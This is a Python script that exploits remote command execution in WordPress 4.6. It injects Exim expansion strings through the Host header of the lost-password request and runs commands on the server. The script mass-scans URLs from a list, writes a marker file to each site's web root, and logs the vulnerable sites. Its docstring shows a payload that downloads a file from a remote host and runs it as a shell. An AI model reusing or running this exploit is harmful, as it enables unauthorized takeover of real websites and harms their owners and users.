# ! /usr/bin/env python3
# -*- coding:utf-8 -*-
# __author__:leezp
# __date__:2019-08-11
# demo,需结合 常用用户名词典使用

import random
import string
import time
import requests
import queue


class wordpress_core_4_6_rce:
    def __init__(self):
        pass

    def prep_host_header(self, cmd):
        """
        target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce}} null)
        /usr/bin/curl -o/tmp/rce $rev_host/rce.txt
        target(any -froot@localhost -be ${run{/bin/bash /tmp/shell}} null)
        target(any -froot@localhost -be ${run{/bin/touch /var/www/html/vuln}} null)
        """
        rce_cmd = "${run{%s}}" % cmd
        rce_cmd = rce_cmd.replace('/', '${substr{0}{1}{$spool_directory}}')
        rce_cmd = rce_cmd.replace(' ', '${substr{10}{1}{$tod_log}}')
        rce_cmd = 'target(any -froot@localhost -be %s null)' % rce_cmd
        return rce_cmd

    def send_command(self, url, cmd):
        try:
            httpreq = requests.session()
            headers = {'Content-Type': 'application/x-www-form-urlencoded',
                       'User-Agent': 'GoogleSpider',
                       'Host': self.prep_host_header(cmd)
                       }
            data = 'user_login=admin&wp-submit=Get+New+Password'
            resp = httpreq.post(url, headers=headers, data=data)
        except Exception as ex:
            resp = None
        return resp

    def verify_result(self, url):
        try:
            resp = requests.get(url, timeout=30)
            if resp.status_code == 200 or resp.status_code == 304:
                return True
        except Exception:
            pass
        return False

    def verify(self, url):
        result = {}
        URL = url + '/wp-login.php?action=lostpassword'
        # flag = "".join(random.choice(string.ascii_letters) for _ in range(8))
        # flag = flag.lower()  # VjPtgeVg
        cmd = "/bin/touch /var/www/html/vuln"
        resp = self.send_command(URL, cmd)
        time.sleep(2)
        if self.verify_result(url + '/vuln'):
            print(url)
            with open("vulnerable.txt", "a", encoding='utf-8') as f:
                f.write(url + "\n")


q = queue.Queue()
if __name__ == "__main__":
    file = open('wordpress ver=4.6.14.txt', encoding='UTF-8')  # encoding='UTF-8'
    for x in file.readlines():
        q.put(x.split(',')[0])
    i = 1
    while not q.empty():
        url = q.get()
        # url='http://192.168.255.147:8003'
        # url='http://50.21.181.110'
        print('verify 第' + str(i) + '个 ' + url)
        i = i + 1
        wordpress_core_4_6_rce().verify(url)
